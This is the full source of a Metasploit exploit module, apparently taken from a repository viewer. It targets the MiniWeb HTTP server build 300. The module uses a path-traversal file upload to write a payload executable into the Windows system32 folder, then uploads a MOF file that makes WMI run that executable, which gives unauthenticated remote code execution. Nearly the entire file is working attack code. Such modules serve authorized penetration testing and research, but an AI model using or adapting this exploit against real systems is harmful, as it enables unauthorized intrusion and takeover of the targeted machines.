metasploit-framework/modules/exploits/windows/http/miniweb_upload_wbem.rb

136 lines
4.3 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /MiniWeb/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "MiniWeb (Build 300) Arbitrary File Upload",
'Description' => %q{
This module exploits a vulnerability in MiniWeb HTTP server (build 300).
The software contains a file upload vulnerability that allows an
unauthenticated remote attacker to write arbitrary files to the file system.
Code execution can be achieved by first uploading the payload to the remote
machine as an exe file, and then upload another mof file, which enables
WMI (Management Instrumentation service) to execute the uploaded payload.
Please note that this module currently only works for Windows before Vista.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AkaStep', # Initial discovery
'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
],
'References' =>
[
['OSVDB', '92198'],
['OSVDB', '92200'],
['URL', 'http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
# Tested on MiniWeb build 300, built on Feb 28 2013
# - Windows XP SP3 (EN)
['MiniWeb build 300 on Windows (Before Vista)', {}]
],
'Privileged' => true,
'DisclosureDate' => "Apr 9 2013",
'DefaultTarget' => 0))
register_options([
Opt::RPORT(8000),
OptInt.new('DEPTH', [true, 'Traversal depth', 10])
], self.class)
end
def check
begin
uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
2013-08-30 21:28:54 +00:00
end
if !res or res.headers['Server'].empty?
return Exploit::CheckCode::Unknown
elsif res.headers['Server'] =~ /^MiniWeb$/
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
2013-08-30 21:28:54 +00:00
end
def upload(filename, filedata)
print_status("#{peer} - Trying to upload '#{::File.basename(filename)}'")
uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}")
depth = "../" * (datastore['DEPTH'] + rand(10))
boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}"
post_data = "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{depth}#{filename}\"\r\n"
post_data << "Content-Type: application/octet-stream\r\n"
post_data << "\r\n#{filedata}\r\n"
post_data << "--#{boundary}\r\n"
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
return res
end
def exploit
fname = "#{rand_text_alpha(rand(10)+5)}"
# upload exe
exe_name = "WINDOWS/system32/#{fname}.exe"
exe = generate_payload_exe
print_status("#{peer} - Sending executable (#{exe.length.to_s} bytes)")
upload(exe_name, exe)
# upload mof
mof_name = "WINDOWS/system32/wbem/mof/#{fname}.mof"
mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
print_status("#{peer} - Sending MOF (#{mof.length.to_s} bytes)")
upload(mof_name, mof)
# list files to clean up
register_file_for_cleanup("#{::File.basename(exe_name)}")
register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
end
end